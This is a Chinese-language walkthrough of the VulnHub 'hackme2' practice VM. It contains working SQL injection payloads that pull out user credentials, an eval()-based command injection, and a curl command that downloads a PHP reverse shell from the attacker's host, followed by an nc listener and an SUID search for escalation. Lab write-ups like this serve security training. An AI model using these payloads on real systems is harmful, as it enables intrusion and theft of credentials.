靶机描述
'hackme2' is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think out of the box to exploit the vulnerabilites. The goal is to gain limited privilege access via web vulnerabilities and subsequently, privilege escalate as a root user. The lab was created to mimic real world web vulnerabilities.
'hackme2' uses DHCP and in the possible event that the mysqld shuts down on its own (very rare cases), attempt to force restart the machine and it should be working fine subsequently.
下载 https://www.vulnhub.com/entry/hackme-2,618/
*清单*
- 信息搜集
- netdiscover
- nmap
- sql注入
- fuzz
- 命令执行
- 提权
- s位的后门文件
信息搜集
*靶机IP*
*端口扫描*
nmap -A -p- 192.168.31.184
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
| 256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_ 256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
渗透测试
sql注入
*payload*
'union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/#
得到
books,users 2 3 SGD
'union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_schema=database()#
得到
id,bookname,price,id,user,pasword,name,address 2 3 SGD
'union/**/select/**/group_concat(user,pasword),2,3/**/from/**/users#
在返回数据到得到superadmin
以及密码密文
*解密*
获取shell
在登陆成功后尝试了文件上传功能
发现只能上传图片,并且上传后访问不到
在这里可以看到相比 hackme1 下面多了框框
*fuzz*
接下来使用 burp 对参数进行 fuzz
对参数 fname lname fuzz
字典选择 Fuzzing - full
*fuzz结果*
当输入 **id 时**
其返回了命令执行的结果
Fname s
Lname `cat<welcomeadmin.php`
得到源码
查看源代码
<?php
$fname = $_POST["fname"];
$lname = $_POST["lname"];
$lname = preg_replace('/[;s]/','',$lname);
if($fname=="" || $fname==" " || $lname=="" || $lname==" "){
echo "You have to search with both First and Last name";
}else{
echo "The system is checking the backend for user: ".$fname ." ".$lname." ";
echo "</br>";
echo "</br>";
echo "User ". $fname. " ";
eval("echo ".$lname.";");
echo " cannot be found";
}
?>
$lname 会造成命令执行
得到shell
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
python3 -m http.server 80
输入
;system('curl${IFS}http://192.168.31.171/shell.php${IFS}-o${IFS}shell.php');
nc -lvp 1234
访问shell.php
得到shell
获取root
find / -user root -perm -4000 -print 2>/dev/null
*获取root*
最近打了几次AWD比赛,发现手中的工具依然不好用,在github上发现了AoiAWD,AoiAWD 是一个由Aodzip(安恒信息 海特实验室研究员、HAC战队成员)维护的一个针对于CTF AWD模式的开源项目。专为比赛设计,便携性好,低权限运行的EDR系统。…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论